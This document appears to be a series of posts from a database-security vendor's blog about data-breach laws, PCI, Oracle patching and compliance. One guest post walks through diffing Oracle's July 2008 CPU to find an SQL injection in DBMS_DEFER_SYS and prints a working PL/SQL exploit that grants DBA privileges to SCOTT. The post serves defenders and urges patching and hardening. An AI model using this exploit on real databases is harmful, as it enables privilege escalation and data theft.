

In the midst of all the excitement around healthcare reform, the fact that both the House and Senate made some progress on their (separate) bills for protecting personal information hasn’t received the attention it deserves. Sure, I think we’re up to 46 states that now have their own breach notification laws, but simplifying this patchwork and raising the bar in the states with more lax regulations should improve the state of database security overall.

So, where does this stand?

The biggest advance was in the House, where the “Data Accountability and Trust Act” (aka H.R.2221) passed on December 8th and has been sent to the Senate. It includes provisions aimed at improving security policies, as well as breach notification requirements. See: http://www.scmagazineus.com/national-data-breach-notification-bill-passed-in-us-house/article/159404/

The Senate has two bills of its own that made it out of committee in November and await a floor vote. The “Personal Data Privacy and Security Act of 2009” (looks like they’ll have to update the name) and the “Data Breach Notification Act” address the need to better secure sensitive information and to notify individuals in case of a breach, respectively. See: http://www.eweek.com/c/a/Security/Senate-Committee-Passes-Data-Breach-Laws-590570/

There is still work to be done in Washington (the Senate must pass its bills, the House and Senate versions must then be reconciled, and of course everyone gets to vote again), but even so, I’m optimistic that something will come of this next year. Maybe I should have put that in my predictions for 2010. If it happens, I think it will bring more focus in virtually every company on the need to better secure databases. Those that have already deployed tools to monitor database activity will be in the best position to meet the new requirements with minimal disruption, and for those that have been looking for ways to justify the expense to management, this will make it much easier.

In light of last week’s CPU announcements, I invited my colleague Aviv Pode, Sentrigo’s Head of Security Research, to submit a special guest blog post. Thanks Aviv!

Oracle releases Critical Patch Updates (CPUs) every three months, containing security code fixes for vulnerabilities discovered by its own security personnel or by external researchers and hackers. By exploring these CPUs we can obtain valuable information about the vulnerabilities addressed by the patches, and use that information to create exploits that attack or hack the database. Thus, ironically, each time Oracle releases a new CPU to help protect databases, it actually increases the risk of Oracle databases worldwide being attacked.

This blog post describes and demonstrates the simple process of exploring Oracle’s CPUs to create working exploits that can be used to attack or hack an Oracle database. Only basic familiarity with information security and databases is required.

I will demonstrate the ease with which hackers can turn Oracle CPUs into attack vectors; my intent is to show IT security personnel how their opponents operate. I’d like to emphasize that the best way to protect databases against hackers is a mix of several defense layers:

  1. You must apply the CPUs as soon as you can after they are released.
  2. You must harden the database and disable any functionality you do not need (see the sketch after this list).
  3. You should deploy security measures such as monitoring and virtual patching to add another layer of defense.
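
As one small example of the hardening in item 2, revoking PUBLIC execute privileges on network-capable built-in packages is a common first step. This is a sketch only – the package names below are the classic candidates, and you should verify that no legitimate application depends on them before revoking:

-- Revoke PUBLIC access to network packages that are
-- frequently abused and rarely needed by applications
REVOKE EXECUTE ON UTL_TCP FROM PUBLIC;
REVOKE EXECUTE ON UTL_SMTP FROM PUBLIC;
REVOKE EXECUTE ON UTL_HTTP FROM PUBLIC;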

Oracle Databases & Critical Patch Updates

Oracle is considered the leading and most widely used Database Management System (DBMS) in the enterprise world. Oracle databases form the backbone of most critical or sensitive information systems, from government and military, through telecommunications, commercial and financial companies, to small businesses and web applications. Thus, Oracle databases probably store the most sensitive and valuable information in the world, anything from credit card information and personal health records to business transactions and national security documents.

In the past, Oracle installations shipped with weak default configurations, which made it easy for malicious users to penetrate Oracle databases. Among these weak defaults were active privileged user accounts with well-known default passwords, weak authentication settings and more. Since then, Oracle has hardened these default settings, closing off many of the quick and easy attack methods that were publicly known, but leaving an interesting attack vector – exploitation of vulnerabilities in built-in code.
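
As a quick illustration of that first point, a query along these lines shows which of the well-known accounts are still open on an instance (a sketch – the account list here is just the classic examples, and your installation may have others):

-- List well-known default accounts that remain open
SELECT username, account_status
FROM dba_users
WHERE username IN ('SCOTT', 'DBSNMP', 'OUTLN', 'CTXSYS', 'MDSYS')
AND account_status = 'OPEN';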

Code patches are released by software vendors to correct bugs discovered in their products. In many cases these bugs affect security, and the patches are actually fixes to security vulnerabilities that reside in the code itself. Oracle has released its Critical Patch Updates (CPUs) every three months since January 2005. These CPUs, which in the past also contained fixes for bugs unrelated to security, now focus only on security issues. Oracle, naturally, publishes very little information about the vulnerabilities or attack possibilities, and refrains from delivering valuable information into the wrong hands. At most, Oracle indicates the high-level component being addressed, or details the required privileges and severity level of the bug (using the Common Vulnerability Scoring System [CVSS]).

However, the CPUs are not helping protect Oracle customers much. An interesting situation exists in most Oracle installations worldwide, severely compromising data confidentiality, integrity and availability in those systems. A survey conducted by Sentrigo showed that about 90 percent of Oracle customers do not install Oracle CPUs in the six months following their release, while about 60 percent never install them at all. This means that most Oracle databases worldwide currently contain unpatched vulnerabilities in built-in components, which may be exploited by hackers or malicious users.
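
If you are unsure where your own databases stand, one quick check is the patch history the database keeps about itself (a sketch – the dba_registry_history view exists on recent 10g releases and later, and is only populated if the post-patch catalog scripts were actually run):

-- Show the history of patches and CPUs recorded in the database
SELECT action_time, action, version, comments
FROM dba_registry_history
ORDER BY action_time;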

Exploring Oracle CPUs

Oracle CPUs are available for every supported chipset and operating system, as a compressed directory containing a set of sub-directories. The CPU contains meta-data for the entire patch, listing identification and very basic information about the bug fixes, stored in text and XML files. Each sub-directory is referred to as a ‘molecule’, and each molecule has a unique identification number. The molecule whose number corresponds to the name of the compressed directory is a special molecule containing information about the entire CPU. Each of the other molecules contains a fix for a different vulnerability found in a built-in Oracle component. Inside each molecule we find two sub-directories – “files” and “etc”. Under “files” are the corrected files, while under “etc” is meta-data such as the location of the corrected files under the Oracle Home, the feature or component the files relate to, and the affected Oracle versions.
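
Putting this together, the layout of an extracted CPU looks roughly like the following (a sketch reconstructed from the description above – the names in angle brackets are placeholders, not copied from an actual patch):

p<patch_number>/
  <patch_number>/        (the special molecule describing the entire CPU)
  <molecule_id>/
    files/               (the corrected files themselves)
    etc/
      config/
        actions          (how ‘opatch’ should apply this fix)
  <molecule_id>/
    ...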

Oracle database CPUs usually contain fixes to four types of files – binary, Java, PL/SQL and SQL files – although on occasion corrections are made to configuration and other types of files. The meta-data in the ‘etc’ sub-directory indicates how ‘opatch’ (Oracle’s utility for applying patches) should apply the fix. Usually it indicates a simple ‘copy’ to replace a PL/SQL component or SQL script, or an ‘archive’ to store a fixed object (.o) file in an archive (.a) file. This can be viewed in the “actions” file, under “etc/config”.

Now that we know what kinds of files we expect to find inside the CPU, we can proceed to see how these files can be used to find and understand the vulnerabilities fixed by the patch.

Finding an exploitable vulnerability

To demonstrate, we will explore the July ’08 CPU for Oracle 10.2.0.3 running on 32-bit Linux. After downloading and extracting the compressed file we find 55 molecules. For our learning purposes we can pick a simple one, say 7154835. This molecule contains, under ‘files’, a single PLB file, to be stored in the directory specified in the ‘etc/config/actions’ file, under the Oracle Home.

PLB files are wrapped PL/SQL files, containing the code of built-in Oracle components originally written in PL/SQL by Oracle. The PL/SQL code is wrapped using Oracle’s proprietary wrapping algorithm. The algorithm for Oracle 9i wrapped code, however, was cracked and published by David Litchfield of NGS-Security at Black Hat. The Oracle 10g and 11g wrapping algorithm has not yet been published, but it is safe to assume it is available to hackers worldwide. It is important to note that even Oracle does not consider this wrapping to be anything more than obfuscation; it is not cryptographically strong like a PKI infrastructure, for example.

Once the PLB file has been unwrapped (using tools available to hackers) we can view the plain-text PL/SQL code. This can not only help us find the vulnerabilities that were patched, but actually find new, unknown ones by analyzing the code – but that is a matter for another post 🙂 To continue with our demonstration, the PLB file we found in the molecule and unwrapped is ‘prvtdefr.plb’. We will locate and unwrap the same file from an unpatched Oracle installation, or better yet, one patched with the previous CPU – April ’08. The file can be found in the corresponding directory under the Oracle Home, as specified in the molecule’s ‘actions’ meta-data file – ‘$ORACLE_HOME/rdbms/admin/’.

Now we have two versions of the same Oracle built-in code file, one from before and one from after the code fix. All we need to do is compare the two files and locate the changes; in most cases only minimal additional effort is required to understand the vulnerability.

Using a simple text-diff utility, we find several changed lines of code, which we can view in clear text. We can see that the changes were made in the ‘dbms_defer_sys’ package, whose code is implemented here. Scrolling down, we can examine the changes made in the ‘delete_tran_inner’ procedure. First, let’s look at the procedure header:

PROCEDURE DELETE_TRAN_INNER(DEFERRED_TRAN_ID IN VARCHAR2,
  DESTINATION IN VARCHAR2, CATCHUP IN RAW) IS

We can see three parameters passed to this procedure, among them ‘DESTINATION’, a varchar2.

In the old PL/SQL file, before the code fix, we can see that inside the procedure the parameters passed to it are concatenated into new variables:

COND1 := 'd.deferred_tran_id=''' || DELETE_TRAN_INNER.DEFERRED_TRAN_ID
  || ''' AND ';
COND2 := 'd.dblink=''' || NLS_UPPER(DELETE_TRAN_INNER.DESTINATION)
  || ''' AND ';

These variables are later concatenated into an SQL SELECT statement and then executed:

DBMS_SQL.PARSE(SQLCURSOR, 'SELECT d.deferred_tran_id, d.dblink ' ||
  'FROM "_DEFTRANDEST" d ' ||
  'WHERE ' || COND1 || COND2 || COND3 || ' 1 = 1', DBMS_SQL.V7);
IGNORE := DBMS_SQL.EXECUTE(SQLCURSOR);

Let us now examine the corresponding lines in the new fixed code:

COND1 := 'd.deferred_tran_id=:deferred_tran_id AND ';
COND2 := 'd.dblink=:destination AND ';

We can see that bind variables are now used, the safe way to avoid SQL injection vulnerabilities. From these code changes we can conclude that the patch is intended to fix an SQL injection vulnerability in the old PL/SQL code. However, ‘delete_tran_inner’ is a private procedure, which a user cannot execute directly. In this simple case, a closer look finds a public ‘delete_tran’ procedure that a user can execute directly, and which in turn calls ‘delete_tran_inner’ without performing input validation or sanitization either. We can now continue to create an exploit for this vulnerability.

Creating an Exploit

After locating the fixed vulnerability and identifying the weak procedure and parameters we can exploit, we can write (or copy from the web) an exploit and simply adjust it to target our vulnerable procedure. The code below opens a cursor which grants DBA privileges to SCOTT, the malicious user account we will use to hack the database. By calling the ‘delete_tran’ procedure in ‘dbms_defer_sys’ and passing an SQL injection through its destination parameter, we can execute the evil cursor:

DECLARE
  C NUMBER;
BEGIN
  C := DBMS_SQL.OPEN_CURSOR;
  DBMS_SQL.PARSE(C,
    'DECLARE
       PRAGMA autonomous_transaction;
       BEGIN
         EXECUTE IMMEDIATE ''grant DBA to SCOTT'';
         COMMIT;
       END;',0);
  DBMS_DEFER_SYS.DELETE_TRAN('x',''' and 1=DBMS_SQL.EXECUTE('||C||')--');
END;
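
To see why this works, here is roughly what the dynamic statement built inside ‘delete_tran_inner’ looks like once the injected destination value is spliced into COND2 (a sketch – the actual cursor number will differ, and NLS_UPPER will have uppercased the injected text):

SELECT d.deferred_tran_id, d.dblink
FROM "_DEFTRANDEST" d
WHERE d.deferred_tran_id='x' AND d.dblink='' AND 1=DBMS_SQL.EXECUTE(3)--' AND ... 1 = 1

The injected quote closes the string literal, the call to DBMS_SQL.EXECUTE runs our privileged cursor as part of evaluating the WHERE clause, and the trailing comment marker (--) discards the rest of the original statement.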

Theoretically, executing this code on an Oracle 10.2.0.3 instance not patched with the July ’08 CPU will result in Scott being granted DBA privileges on the entire database. As a side note, this code will not work on an 11g database, because the dbms_sql package was hardened to check whether privileges have changed between the parse and the execute stages.

This demonstration focused on a PL/SQL molecule. Many molecules contain binary files, which we cannot examine as easily as what we have seen here. To examine these binary files, more sophisticated tools than ‘diff’ are required, such as DataRescue’s IDA Pro and Zynamics’ BinDiff. However, the idea remains the same – compare the old and new code, find the changed function, understand the fix and create a targeted exploit. In such more complex cases, if you have found the code fix but do not understand the vulnerability, or do not know how to successfully exploit it, a fuzzer may come in handy. Running a good fuzzer on the old version of the fixed function or procedure will, in many cases, reveal the information hackers are looking for.

Conclusion

As we have demonstrated, using Oracle’s CPUs to find vulnerabilities and create working exploits that target, attack and hack Oracle databases is quite simple. As a result, hackers and malicious users can easily create such exploits and publish them on the web for other users to utilize. In actuality, this means every time Oracle releases a CPU, hackers are given more critical information on how to successfully attack Oracle databases, which increases the risk level for Oracle installations worldwide.

The conclusion is simple: apply patches AS SOON AS POSSIBLE, and harden your database by disabling unnecessary components. And if your organization is part of the majority that cannot afford to do so – for availability (downtime), practical or sensitivity considerations – apply a security measure such as virtual patching to block attacks targeting the database.

-Aviv

I was invited to post a guest editorial on Ryan Naraine’s Zero Day blog over on ZDNet on the topic of database patching, which you are welcome to read.

Anticipating some responses to that post, I’d like to distill further what I intended to convey. From my exposure to database operations at enterprises large and small, the one issue that keeps haunting me is database patching, about which I’ve posted in the past. Some enterprises do a good job of it, but they are the minority. In most cases, the patching issue seems so insurmountable that instead of doing at least selective patching, companies have a “deer in the headlights” reaction and choose stagnation.

This is asking for trouble. I’ve said it once and I’ll say it again – forget all the sophisticated zero-day hacks. Most database attackers will use the easy way in – a published exploit of a known vulnerability. You can’t protect yourself against everything, but you shouldn’t knowingly leave your DBMS wide open. Imagine that you read in the paper that burglars had a master key that can open all locks of a certain brand – wouldn’t you check to see if your door lock was of that make, and have it changed if it were?

So this is why patching is important, but we know it’s also difficult, which is why I proposed this pragmatic approach. It basically says: minimize what you have to patch, prioritize what’s important to patch while weighing the trade-offs in business interruption and cost, then patch according to your priorities. Go into this with your eyes wide open rather than just gambling on not being next… Doing something is better than doing nothing.

When it’s logistically difficult to patch regularly, or to gain an extra layer of security, virtual patching for databases provides a low-cost, low-overhead solution with minimal interruption to daily operations.

It’s been a while since I’ve blogged. Hit a dry spell, I guess. Will try to post more frequently and about some technical issues as well. Anyway, I’m at the RSA conference in San Francisco for the entire week. It’s been a great conference so far with interesting keynotes and sessions. Also, a lot of evening receptions that basically give you an excuse to drink beer and wine 🙂

I visited the PCI reception on Monday evening, which was a big success, with many interesting conversations. I spoke with many security managers from large organizations about PCI. It turns out that 99% of the people I’ve talked with are either in the midst of a PCI audit or have just undergone one. Interestingly, when asked about database security, most of the security managers I’ve talked with say that this is the next thing for them to invest in.

On Tuesday evening, I went to the SC Magazine awards gala. My company (Sentrigo) was nominated for “Rookie security company of the year”, which is very important to me and shows the security industry’s recognition of the importance of database security. And the best part of the evening was that we actually won!!! It was amazing being called to the stage and later interviewed for the magazine. I felt a bit like I was at the Oscars… Sorry about the poor image quality…

[Photo: SC Magazine awards gala]

The only problem with the conference so far is that I actually don’t have enough time to go to all the sessions and keynotes I would like to go to. Too many meetings, I guess…

Next week, I’ll be presenting at Collaborate08 in Denver under the auspices of IOUG – if you’re around come and see me on Monday, or catch me later at our booth (#1826) in the IOUG section.

The rumors about my death have been greatly exaggerated, to paraphrase Mark Twain. I guess I’m a burst-blogger, at least for as long as I’m also the CTO of a growing start-up.

The credit card companies have started to make good on their threats, levying hefty fines like this one issued against TJX and its banks. This makes the pain of non-compliance very real, and I think we are going to see more of it as the credit card companies demonstrate that they mean business. This is one of the benefits of having an industry-regulated standard as opposed to laws and regulations – the incentives to enforce are business incentives, so they work…

Apropos, another recent development around PCI, which I think has not been receiving the attention it should, is the passing of the first state law to augment the PCI DSS standard. Minnesota, the state that passed this law, is home to some of America’s largest retailers, such as Target and Best Buy, so on its own this law may have far-reaching impact. Moreover, similar to California Senate Bill 1386, which deals with privacy breach notification and spawned copycat laws in some 38 other states, I expect the Minnesota law to be the harbinger of additional state laws (Texas, Massachusetts and Illinois are contemplating it), although in California a similar bill was shot down by the governator.

It may seem redundant to enact laws where an industry standard is already working well, but I understand the lawmakers’ perspective. You can’t just leave everything to market forces. Yes, right now it seems PCI is on the right track to provide protection for consumers. But this may not necessarily be the case in the future. Call it short-term overkill, long-term insurance.

In the meantime, the retailers are trying to play “pass the hot potato” with the credit card issuers. While I agree that less data storage is less potential for data theft, there are accounting issues and simple business streamlining issues that need to be addressed. Guess what? The retailers’ gambit is not going to work. PCI DSS is not reversible, it’s only going forward. Credit card companies provide a valuable service to both consumers and retailers, and in this game, they have the power. Don’t like the requirements VISA is imposing? You have a choice – either comply, or don’t accept VISA anymore (and good luck with that…!), or outsource CC processing entirely.

The reality is that PCI is going to become part of the cost of doing business. It’s several years too late, but better late than never.

You know that data breaches have become part of big business reality when the Harvard Business Review publishes a hypothetical case study entitled “Boss, I Think Someone Stole Our Customer Data”. The case study does a very good job of illustrating the initial confusion and many gray areas that enterprises face when confronted with a possible breach.

When the first signs of a possible breach appear, there is often some uncertainty regarding the nature of the breach, its extent, and whether there has been a breach at all. Insider breaches are especially tough, because insiders have a better shot at covering their tracks than outside intruders, and have more of the attack surface visible to them to begin with (this is one place where database monitoring can help).
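
As a hedged illustration of that last point, even Oracle’s built-in auditing gives you a baseline trail on sensitive objects (the schema and table names here are hypothetical, and this assumes the AUDIT_TRAIL initialization parameter has been enabled):

-- Record every access to a sensitive table, per statement execution
AUDIT SELECT, UPDATE, DELETE ON app.customers BY ACCESS;

-- Later, review who touched it via the audit trail
SELECT username, action_name, timestamp
FROM dba_audit_trail
WHERE obj_name = 'CUSTOMERS';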

Once it is established that a breach has occurred – and this does not have to be with 100% certainty; it’s enough to establish that a breach is likely – there are many things an enterprise needs to do, and do quickly.

Finding the culprit(s) (the “who done it”) would be many people’s instinct, but actually this should be quite low on anyone’s list, and usually takes a long time to do anyway. The top 3 immediate steps that I would take are as follows:

(more…)

I promised to blog a bit about my traveling, so here I go:

I was visiting customers in India and the US, and giving presentations to Oracle user groups in the US. Amazingly, the state of US airports is just getting worse every month. Flying from Israel to India and from India to NY went without any problems. However, not only did a 35-minute flight from NY to Boston take 3 hours, they also managed to lose my suitcase in the process. Every flight I took in the US in the previous week was late.

Enough moaning and back to Oracle security… I would like to share with you some insights I had while giving presentations. First, it looks as if database security is getting more and more attention from both DBAs as well as IT managers. By show of hands at the presentations, I could see that at least some of the DBAs are handling security issues as part of their day-to-day job. But still, DBAs are not hearing the following from their managers – “last year you met your MBOs because no database breach had occurred. Here is your bonus…” – though many have heard the bonus speech for HA or performance MBO achievements.

Second, almost no one had deployed the July 2007 Critical Patch Update from Oracle. From a crowd of about 50, only 2 raised their hands.

Third, and most startling of all, only about a third of the DBAs had ever deployed an Oracle CPU. Let me repeat that – more than two-thirds of the DBAs in this small but significant sample have never deployed an Oracle CPU. Ever.

So this got me thinking – do we care about Oracle CPUs at all? Oracle was getting a lot of heat from security researchers for not providing security patches, or providing them at irregular intervals. Finally, Oracle is stepping up to the plate with the patches. They provide them on a regular basis, and they announce each patch before issuing it so organizations can prepare. They are improving coding techniques and code vulnerability scanning tools. And after all that, customers are still not protected. The reason is that the database is an extremely complicated piece of software and is the lifeline of the organization. An enterprise needs to test a CPU thoroughly before deploying it, and testing takes a lot of time (months). This is further complicated by the fact that many organizations have applications running on top of Oracle databases, and those applications are not “forward compatible”, nor certified by their vendors to run on future Oracle versions.

Ironically, from a security standpoint the situation after a CPU is announced is actually worse than before: the hackers get a road-map of all the vulnerabilities while most organizations have not yet plugged those holes. This is similar to hacking IPS software in order to retrieve vulnerabilities (see this Black Hat presentation).

I’m not saying that Oracle should stop providing CPUs. Quite the contrary – I’m saying that organizations must deploy CPUs as quickly as possible to keep this sensitive period short. Even considering the objective difficulties in applying patches, it seems that enterprises are not taking database vulnerabilities seriously enough. Organizations must also have other solutions to mitigate the threat in the post-CPU-release period. Those solutions must not change the Oracle software at all, or else they will fall into the same trap of interdependency, stability issues and so forth. They must provide virtual patches that test for attacks externally and plug the security holes from the outside.

I am curious to know other people’s experiences and views on this topic – so fire away…

Recent opinions about PCI-DSS and whether it should or should not be softened made me think of a wider issue I often come across: The illusory equivalence of regulatory compliance with “security”.

I would therefore like to argue that compliance cannot equate to security, and it never will. The reasons for this are inherent to the motivation behind regulations and the process by which they are created and enforced.

First, regulations (be they law or industry standard) have limited scope. They are there to ensure that a certain set of rules is followed in order to achieve a specific goal. If they end up generating better security against threats outside their target scope, that’s a positive side-effect. Sarbanes-Oxley (SOX) exists to ensure truthful financial reporting to the SEC, so it requires financial data to be watched closely. If millions of customer records are stolen from a public company, that company may remain 100% SOX-compliant as long as it can show how the theft affected its financial figures – but a company that allows massive data theft to happen is clearly not as secure as it ought to be.

Second, regulations are often created, even within their applied scope, as a minimum requirement – that is, a requirement that many organizations within the relevant space have some chance of fulfilling; perhaps not the lowest common denominator, but a low one to be sure. Some regulations emphasize auditing, focusing on what has already happened, and not necessarily on preventing it from happening in the first place. In other words, regulatory compliance is not an Olympic medal – it just means you get to participate in the opening ceremony.

Third, enforcement of compliance is not perfect. In some cases (HIPAA comes to mind) it’s very weak. This leaves many companies not even knowing whether they’re compliant – it is up to their own interpretation, which usually means the path of least resistance. With full compliance setting the minimum standard, anything less is, well, not much…

And fourth, regulations are often too slow to keep up with emerging threats. A few years back nobody knew what phishing was, or how to gain DBA privileges using SQL injections. Regulatory requirements, especially legislation (like SOX, HIPAA and GLBA) are difficult to update, and so will always trail behind fast moving computer-related threats and techniques. PCI-DSS stands a better chance, since it is an industry standard and was originally intended to be updated as circumstances change.

While some enterprises struggle with achieving compliance, leading companies will have systems and procedures in place that exceed the compliance requirements. Their focus will be on securing their systems and data, while achieving compliance with minimal extra effort and at minimum cost.